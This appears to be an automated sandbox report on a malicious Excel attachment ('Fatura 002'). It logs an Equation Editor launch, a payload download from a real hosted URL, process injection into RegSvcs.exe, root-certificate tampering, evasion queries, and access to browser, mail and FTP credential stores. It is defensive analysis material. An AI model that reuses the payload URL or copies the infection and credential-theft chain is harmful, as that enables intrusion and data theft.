Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://menyos.com//m/
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://menyos.com/5m/
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exe
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exefj
Source: EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exeiiC:
Source: EQNEDT32.EXE, 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exej
Source: EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exeuj
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown HTTPS traffic detected: 104.21.35.109:443 -> 192.168.2.22:49163 version: TLS 1.2

System Summary

Source: sheet1.xml, type: SAMPLE Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00263BA0 6_2_00263BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00268C30 6_2_00268C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0026F488 6_2_0026F488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0026BFA8 6_2_0026BFA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_002647B8 6_2_002647B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00263EE8 6_2_00263EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00462150 6_2_00462150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00466F20 6_2_00466F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00469928 6_2_00469928
Source: Fatura 002.xlam.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sheet1.xml, type: SAMPLE Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/5@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Fatura 002.xlam.xlsx
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR87F3.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Fatura 002.xlam.xlsx Virustotal: Detection: 50%
Source: Fatura 002.xlam.xlsx ReversingLabs: Detection: 71%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\coolz.exe C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: credssp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ncrypt.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: bcrypt.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: coolz.exe, 00000005.00000003.483771153.0000000003970000.00000004.00001000.00020000.00000000.sdmp, coolz.exe, 00000005.00000003.483536666.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp
Source: Fatura 002.xlam.xlsx Initial sample: OLE indicators vbamacros = False
Source: food[1].exe.2.dr Static PE information: real checksum: 0xa2135 should be: 0x120c6d
Source: coolz.exe.2.dr Static PE information: real checksum: 0xa2135 should be: 0x120c6d
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00267988 push esp; ret 6_2_00267995

Persistence and Installation Behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\coolz.exe API/Special instruction interceptor: Address: 362D6CC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3544 Thread sleep time: -360000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03670754 mov edx, dword ptr fs:[00000030h] 2_2_03670754
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\coolz.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\coolz.exe C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\coolz.exe
Source: coolz.exe, 00000005.00000000.472546872.0000000000482000.00000002.00000001.01000000.00000004.sdmp, food[1].exe.2.dr, coolz.exe.2.dr Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.622128316.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match File source: 00000006.00000002.622210442.0000000002001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3688, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.622128316.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY